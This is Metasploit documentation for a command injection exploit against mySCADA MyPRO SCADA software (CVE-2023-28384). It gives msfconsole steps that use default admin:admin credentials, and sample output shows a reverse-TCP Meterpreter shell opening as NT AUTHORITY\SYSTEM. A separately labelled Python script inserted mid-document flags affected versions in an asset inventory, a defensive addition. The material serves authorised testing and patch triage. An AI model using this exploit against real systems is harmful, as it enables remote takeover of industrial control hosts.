metasploit-gs/documentation/modules/exploit/windows/scada/mypro_cmdexe.md
2025-07-17 09:53:40 +01:00

## Vulnerable Application

**Vulnerability Description**

This module exploits a command injection vulnerability in mySCADA MyPRO <= v8.28.0 (CVE-2023-28384).
An authenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of
`NT AUTHORITY\SYSTEM`.

This module uses the default admin:admin credentials, but any account configured on the system can be used to exploit this issue.

Versions <= 8.28.0 are affected. CISA published [ICSA-23-096-06](https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06) to cover
the security issues. The official changelog for the updated version, v8.29.0, is available
[here](https://web.archive.org/web/20230320130928/https://www.myscada.org/changelog/?section=version-8-29-0), although it only mentions a
"General security improvement" without further details.
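
The only fix the text above offers is the version bump, so the practical defensive question is which installs are still on an affected release. The following is an added example (not part of the Metasploit module or the vendor's product) that triages a host inventory against the affected range stated above (<= 8.28.0, fixed in 8.29.0). Version strings are compared numerically rather than as text, because a plain string comparison ranks "8.9.x" above "8.28.0" and would mark an old install as patched. The inventory rows and hostnames are constructed sample data.

```python
"""Flag mySCADA MyPRO installs still on a version affected by CVE-2023-28384.

Added example, not part of the Metasploit module or of mySCADA's software.
The affected range (<= 8.28.0, fixed in 8.29.0) is taken from the module
documentation and ICSA-23-096-06; the host inventory below is constructed.
"""
import re
from typing import List, Tuple

LAST_AFFECTED = (8, 28, 0)   # last affected release per the documentation
FIXED_IN = "8.29.0"          # first release with the "General security improvement"


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn 'v8.28.0', '8.28' or 'MyPRO 8.9.1' into a (major, minor, patch) tuple.

    Numeric comparison matters: as strings, '8.9.0' > '8.28.0', which would
    wrongly treat an old 8.9 install as newer than the last affected release.
    Anything beyond the third component (e.g. a build number) is ignored so a
    hypothetical 8.28.0.x is still treated as affected (conservative choice).
    """
    m = re.search(r"(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    parts = [int(p) for p in m.group(1).split(".")][:3]
    parts += [0] * (3 - len(parts))      # pad '8.28' -> (8, 28, 0)
    return parts[0], parts[1], parts[2]


def is_affected(version: str) -> bool:
    """True when the reported version is at or below the last affected release."""
    return parse_version(version) <= LAST_AFFECTED


def triage(inventory: List[Tuple[str, str]]) -> List[str]:
    """Return the hostnames that still need the 8.29.0 update, sorted."""
    return sorted(host for host, ver in inventory if is_affected(ver))


# Constructed sample inventory: (hostname, MyPRO version as reported by the host)
SAMPLE_INVENTORY = [
    ("hmi-01", "v8.28.0"),      # last affected release
    ("hmi-02", "8.29.0"),       # fixed release
    ("hmi-03", "MyPRO 8.9.1"),  # old release; string compare would get this wrong
    ("hmi-04", "8.26"),         # two-component version string
]

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print(f"{host}: affected by CVE-2023-28384, update to MyPRO {FIXED_IN} or later")
```

Feed `triage()` whatever your asset inventory exports as (hostname, version) pairs; the parser is deliberately tolerant of a leading "v" or product name so the export does not need cleaning first.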

**Vulnerable Application Installation**

A trial version of the software can be obtained from [the vendor](http://nsa.myscada.org/myPRO/WIN/myPRO_x64_8.28.0.exe).
For the product to work correctly, the project and log directories need to be configured first, which can be done through the web interface
(navigate to System > Storage).

**Successfully tested on**

- mySCADA MyPRO 8.28.0 on Windows 10 22H2
- mySCADA MyPRO 8.27.0 on Windows 10 22H2
- mySCADA MyPRO 8.26.0 on Windows 10 22H2

## Verification Steps

1. Install the application
2. Configure the project and log paths (System > Storage in the web interface, running by default on TCP ports 80 & 443)
3. Start `msfconsole` and run the following commands:

```
msf > use exploit/windows/scada/mypro_cmdexe
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(windows/scada/mypro_cmdexe) > set RHOSTS <IP>
msf exploit(windows/scada/mypro_cmdexe) > exploit
```

You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.

## Options

### USERNAME

The username of a MyPRO user (default: admin)

### PASSWORD

The associated password of the MyPRO user (default: admin)

## Scenarios

Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the
following:

```
msf exploit(windows/scada/mypro_cmdexe) > exploit
[*] Started reverse TCP handler on 192.168.1.241:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Checking credentials...
[+] Credentials are working.
[*] Sending command injection...
[*] Sending stage (201798 bytes) to 192.168.1.239
[*] Meterpreter session 12 opened (192.168.1.241:4444 -> 192.168.1.239:57382) at 2024-07-23 23:38:12 -0400
[*] Exploit finished, check thy shell.
meterpreter > shell
Process 2632 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4651]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
```